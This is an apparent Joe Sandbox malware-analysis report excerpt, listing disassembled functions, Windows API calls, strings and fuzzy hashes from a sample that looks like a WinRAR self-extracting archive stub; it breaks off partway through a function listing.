Part of subcall function 00DAD5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00DAD6C7

Part of subcall function 00DAC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00DAC5E5

SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,E7604376,?,00000000,00000001), ref: 00DAEB53
_wcslen.LIBCMT ref: 00DAEB8D
_wcslen.LIBCMT ref: 00DAEBA1
_wcslen.LIBCMT ref: 00DAEBC6
GetFileAttributesW.KERNEL32(?), ref: 00DAEC0C
DeleteFileW.KERNEL32(?), ref: 00DAEC1E
_swprintf.LIBCMT ref: 00DAEC43
GetFileAttributesW.KERNEL32(?), ref: 00DAEC52
MoveFileW.KERNEL32(?,?), ref: 00DAEC6B
MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00DAEC7F
_wcslen.LIBCMT ref: 00DAECFA
_wcslen.LIBCMT ref: 00DAED03
SetWindowTextW.USER32(?,?), ref: 00DAED62

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00DAEE0B
<br>, xrefs: 00DAECC4
%s.%d.tmp, xrefs: 00DAEC36
ProgramFilesDir, xrefs: 00DAEE36

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2983673336-312220925
Opcode ID: d8612cf614895590bd6fd7977fbf1fa7e830040f3ae1735c5bc744e65dcb2358
Instruction ID: 0320cf60e4f26c55f9537529f51bf39260d8ca846829e15dd036031b6c3a5e18
Opcode Fuzzy Hash: d8612cf614895590bd6fd7977fbf1fa7e830040f3ae1735c5bc744e65dcb2358
Instruction Fuzzy Hash: 3EF14072900249AADB21EFA4DC55EEF33BCEF0A710F08452AF906D7190EB749A45CB70

Function 00DB037C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 208
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DA290A: GetModuleHandleW.KERNEL32 ref: 00DA2937
Part of subcall function 00DA290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DA2949
Part of subcall function 00DA290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DA2973

Part of subcall function 00DAC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00DAC5E5

Part of subcall function 00DACCD9: OleInitialize.OLE32(00000000), ref: 00DACCF2
Part of subcall function 00DACCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DACD29
Part of subcall function 00DACCD9: SHGetMalloc.SHELL32(00DDC460), ref: 00DACD33

GetCommandLineW.KERNEL32 ref: 00DB03C9
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00DB03F3
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00DB0404
UnmapViewOfFile.KERNEL32(00000000), ref: 00DB0455

Part of subcall function 00DAFFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DAFFFE
Part of subcall function 00DAFFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DB0038

Part of subcall function 00DA1421: _wcslen.LIBCMT ref: 00DA1445

CloseHandle.KERNEL32(00000000), ref: 00DB045C
GetModuleFileNameW.KERNEL32(00000000,00DF2CC0,00000800), ref: 00DB0476
SetEnvironmentVariableW.KERNEL32(sfxname,00DF2CC0), ref: 00DB0482
GetLocalTime.KERNEL32(?), ref: 00DB048D
_swprintf.LIBCMT ref: 00DB04E1
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00DB04F6
GetModuleHandleW.KERNEL32(00000000), ref: 00DB04FD
LoadIconW.USER32(00000000,00000064), ref: 00DB0514
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00DB0565
Sleep.KERNEL32(?), ref: 00DB0593
DeleteObject.GDI32 ref: 00DB05CC
DeleteObject.GDI32(?), ref: 00DB05DC
CloseHandle.KERNEL32 ref: 00DB061F

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00DB04D2
sfxname, xrefs: 00DB047D
winrarsfxmappingfile.tmp, xrefs: 00DB03E7
STARTDLG, xrefs: 00DB055A
sfxstime, xrefs: 00DB04F1

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3014515783-3710569615
Opcode ID: 3484421439cd38d57cae19794c39c5f14ac15e90342bf686d90cdc8f5e708357
Instruction ID: 90cb0ce05a6a9a927f8fcc0773a59171862bb41d70a933cf2939773dc0fdb2f4
Opcode Fuzzy Hash: 3484421439cd38d57cae19794c39c5f14ac15e90342bf686d90cdc8f5e708357
Instruction Fuzzy Hash: A671FF71500342AFD720AB65EC4AFBB7BA8EB46741F04841AF646D2392DF749948CBB1

Function 00DAC652 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00DADA3D,00000066), ref: 00DAC665
SizeofResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC67C
LoadResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC693
LockResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC6A2
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6BD
GlobalLock.KERNEL32(00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6CE
GlobalUnlock.KERNEL32(00000000), ref: 00DAC756

Part of subcall function 00DAC5B6: GdipAlloc.GDIPLUS(00000010), ref: 00DAC5BC

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DAC737
GlobalFree.KERNEL32(00000000), ref: 00DAC75D

Strings

PNG, xrefs: 00DAC656

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: a77b890ed641170f1334a30f3a56d1f5efd3bb49d4b3c9fffec339873995d3e0
Instruction ID: 7d521c251ff24ab50029dbaeff6192df11f3a588b1bf4a2a90405067780f2b76
Opcode Fuzzy Hash: a77b890ed641170f1334a30f3a56d1f5efd3bb49d4b3c9fffec339873995d3e0
Instruction Fuzzy Hash: 3B314C75610707ABD7119F21EC88D2BBBA8EF46B617080529F905D2261EB31D805DFB0

Function 00D9F963 Relevance: 16.4, APIs: 3, Strings: 6, Instructions: 684COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000800,E7604376), ref: 00D9F9CD

Part of subcall function 00D9E208: _wcslen.LIBCMT ref: 00D9E210

Part of subcall function 00DA2663: _wcslen.LIBCMT ref: 00DA2669

Part of subcall function 00DA3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,00000001,00D9DA04,00000000,?,?,0001040E,?,?), ref: 00DA3D2C

_wcslen.LIBCMT ref: 00D9FD00
__fprintf_l.LIBCMT ref: 00D9FE50

Strings

*messages***, xrefs: 00D9FAD1
RTL, xrefs: 00D9FE12
*messages***, xrefs: 00D9FB0A
,, xrefs: 00D9FE8B
@%s:, xrefs: 00D9FE3A, 00D9FE46
$%s:, xrefs: 00D9FE33

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
API String ID: 2646189078-285229759
Opcode ID: c4595783cd95d7a828a03753f92fd508914ca0e1b275fc6093c8757da5d8c2d0
Instruction ID: 72f2baca840ab84429709efdaa01f12cc39ed9cfb085ecad92432d9531960fbd
Opcode Fuzzy Hash: c4595783cd95d7a828a03753f92fd508914ca0e1b275fc6093c8757da5d8c2d0
Instruction Fuzzy Hash: 7F42E271900319ABDF24DFA8C841BEE77B4FF19710F54052AE906EB281EB719A45CB74

Function 00D9C4A8 Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000), ref: 00D9C4E6

Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59

FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?), ref: 00D9C516
GetLastError.KERNEL32(?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A), ref: 00D9C522
FindNextFileW.KERNEL32(?,?,00000000,?,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000), ref: 00D9C549
GetLastError.KERNEL32(?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00D9C555

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: feddf7722001579b8783bc7515f43caef30ecdf123e6700ee79acd65e3d5d108
Instruction ID: 82411e0a6a0185caa7dcb967ba8586a069fa799a3c87bf453e47a91c5edc7ba2
Opcode Fuzzy Hash: feddf7722001579b8783bc7515f43caef30ecdf123e6700ee79acd65e3d5d108
Instruction Fuzzy Hash: 1C4152B1508346ABC724EF64D885AEAF7E8FB89350F05091EF59AD3240D734E9548BB2

Function 00DBA640 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002,00000000), ref: 00DBA661
TerminateProcess.KERNEL32(00000000,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002,00000000), ref: 00DBA668
ExitProcess.KERNEL32 ref: 00DBA67A

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8973f280971d5072d3e12410b207671d15941b0b0cbd4ef0eac6f015871a0c0d
Instruction ID: 17b416b7be7cb503dd9f67fc6edee5118f1482c59ad08e0e409b30d918544441
Opcode Fuzzy Hash: 8973f280971d5072d3e12410b207671d15941b0b0cbd4ef0eac6f015871a0c0d
Instruction Fuzzy Hash: 67E0B67104060AEFCF116F68DD09E8C3B6AEB50741F084414F80A9A232DF36ED42DBB5

Function 00D99906 Relevance: 2.4, Strings: 1, Instructions: 1169COMMON

Download Yara Rule

Strings

__tmp_reference_source_, xrefs: 00D99C0E

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen$AttributesFile_swprintf$CurrentH_prolog3Process__aulldiv_wcsrchr
String ID: __tmp_reference_source_
API String ID: 3636405837-685763994
Opcode ID: e675dd7a7bce4c038f5568302291a345f8fb2979e6a706430b9066b36f5d6071
Instruction ID: 0d91b33668fa6499e4ba3baee65e1e4907db8efff73b6d37c29a1519425a2152
Opcode Fuzzy Hash: e675dd7a7bce4c038f5568302291a345f8fb2979e6a706430b9066b36f5d6071
Instruction Fuzzy Hash: 57A2F872904285AEDF25DF68C895BEEBBA5EF05300F0C41BAED499B182D7309945CBF1

Function 00DA8C7E Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 121a48ac56a15d7b475154da948805c4acdd5c94bc55f78252e110b18b719b6e
Instruction ID: e64737640af0225aec4d5370a675fdf7abc4330ab797d514363bde5e8150dae1
Opcode Fuzzy Hash: 121a48ac56a15d7b475154da948805c4acdd5c94bc55f78252e110b18b719b6e
Instruction Fuzzy Hash: F8D18271A083418FDB14DF28C84475ABBE1AF8A308F08496DFC899B642D775E905CB6A

Function 00DADAE0 Relevance: 95.2, APIs: 47, Strings: 7, Instructions: 750windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DADC06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DADC24
IsDialogMessageW.USER32(?,?), ref: 00DADC37
TranslateMessage.USER32(?), ref: 00DADC45
DispatchMessageW.USER32(?), ref: 00DADC4F
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00DADC72
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00DADC95
GetDlgItem.USER32(?,00000068), ref: 00DADCB8
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DADCD3
SendMessageW.USER32(00000000,000000C2,00000000,00DC65F4), ref: 00DADCE6

Part of subcall function 00DAF77B: _wcslen.LIBCMT ref: 00DAF7A5

SetFocus.USER32(00000000), ref: 00DADCED
_swprintf.LIBCMT ref: 00DADD4C

Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13

GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00DADDAF
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00DADDD7
GetTickCount.KERNEL32 ref: 00DADDF5
_swprintf.LIBCMT ref: 00DADE0D
GetLastError.KERNEL32(?,00000011), ref: 00DADE3F
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 00DADE92
_swprintf.LIBCMT ref: 00DADEC9
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00DE3482,00000200), ref: 00DADF1D
GetCommandLineW.KERNEL32(?,?,?,?,00DE3482,00000200), ref: 00DADF33
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00DE3482,00000400,00000001,00000001,?,?,?,?,00DE3482,00000200), ref: 00DADF8A
ShellExecuteExW.SHELL32(?), ref: 00DADFB2
Sleep.KERNEL32(00000064,?,?,?,?,00DE3482,00000200), ref: 00DADFFA
UnmapViewOfFile.KERNEL32(?,?,0000421C,00DE3482,00000400,?,?,?,?,00DE3482,00000200), ref: 00DAE023
CloseHandle.KERNEL32(?,?,?,?,?,00DE3482,00000200), ref: 00DAE02C
_swprintf.LIBCMT ref: 00DAE05F
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE0BE
SetDlgItemTextW.USER32(?,00000065,00DC65F4), ref: 00DAE0D5
GetDlgItem.USER32(?,00000065), ref: 00DAE0DE
GetWindowLongW.USER32(00000000,000000F0), ref: 00DAE0ED
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DAE0FC
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE1A9
_wcslen.LIBCMT ref: 00DAE1FF
_swprintf.LIBCMT ref: 00DAE229
SendMessageW.USER32(?,00000080,00000001,?), ref: 00DAE273
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00DAE28D
GetDlgItem.USER32(?,00000068), ref: 00DAE296
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DAE2AC
GetDlgItem.USER32(?,00000066), ref: 00DAE2C6
SetWindowTextW.USER32(00000000,00DE589A), ref: 00DAE2E8
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DAE348
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE35B
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 00DAE3FE
EnableWindow.USER32(00000000,00000000), ref: 00DAE4CC
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DAE50E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE532

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 00DADEB8
winrarsfxmappingfile.tmp, xrefs: 00DADEF3
__tmp_rar_sfx_access_check_%u, xrefs: 00DADDFC
LICENSEDLG, xrefs: 00DAE3F3
STARTDLG, xrefs: 00DADB2D
%s, xrefs: 00DAE219
"%s"%s, xrefs: 00DAE04E

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3247240745-1712381250
Opcode ID: 5b705cd4548bc8b8ef6a968d28339a0f2f1ca5b4b0bbaa055034d27c3fcb8481
Instruction ID: 519d44c169f222101b438e7aa1f026434e0d84a2f53f1b26b6550dc48fb086da
Opcode Fuzzy Hash: 5b705cd4548bc8b8ef6a968d28339a0f2f1ca5b4b0bbaa055034d27c3fcb8481
Instruction Fuzzy Hash: FA42A371944385BEEB21AB64EC8AFFE3B6CEB06744F044015F645EA2D1CBB45A44CB71

Function 00DA290A Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 327
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00DA2937
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DA2949
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DA2973
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DA2C1D
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DA2C37
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DA2C4B
ReadFile.KERNEL32(00000000,?,00007FFE,00DC6F24,00000000), ref: 00DA2C69
CloseHandle.KERNEL32(00000000), ref: 00DA2CCD
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DA2CE6
CompareStringW.KERNEL32(00000400,00001001,00DC6F70,?,DXGIDebug.dll,?,00DC6F24,?,00000000,?,00000800), ref: 00DA2D3A
GetFileAttributesW.KERNELBASE(?,?,00DC6F24,00000800,?,00000000,?,00000800), ref: 00DA2D64
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00DA2DA0

Part of subcall function 00DA28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
Part of subcall function 00DA28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4

_swprintf.LIBCMT ref: 00DA2E12
_swprintf.LIBCMT ref: 00DA2E5E
AllocConsole.KERNEL32 ref: 00DA2E66
GetCurrentProcessId.KERNEL32 ref: 00DA2E70
AttachConsole.KERNEL32(00000000), ref: 00DA2E77
_wcslen.LIBCMT ref: 00DA2E8C
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00DA2E9D
WriteConsoleW.KERNEL32(00000000), ref: 00DA2EA4
Sleep.KERNEL32(00002710), ref: 00DA2EAF
FreeConsole.KERNEL32 ref: 00DA2EB5
ExitProcess.KERNEL32 ref: 00DA2EBD

Strings

uxtheme.dll, xrefs: 00DA2DDF
SetDefaultDllDirectories, xrefs: 00DA296D
<, xrefs: 00DA2D3A
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00DA2E4C
DXGIDebug.dll, xrefs: 00DA29AE, 00DA2D26
kernel32, xrefs: 00DA292D
SetDllDirectoryW, xrefs: 00DA2943
dwmapi.dll, xrefs: 00DA29D9, 00DA2DD5

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
String ID: <$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 270162209-1156125387
Opcode ID: 8278743bdf9c9eb6a5c39e3ba049a8e93f9f48cfc11d186d5fe396c90b5c9397
Instruction ID: 474ba09652c07ef4992beabe84bf69593d6d7bad68b7833ce34aa0da1ed39a5e
Opcode Fuzzy Hash: 8278743bdf9c9eb6a5c39e3ba049a8e93f9f48cfc11d186d5fe396c90b5c9397
Instruction Fuzzy Hash: C1D157B10083869BD7319F65D848FAFBBE8EB85704F50091DF5999B351CBB085489FB2

Function 00DAF7FC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

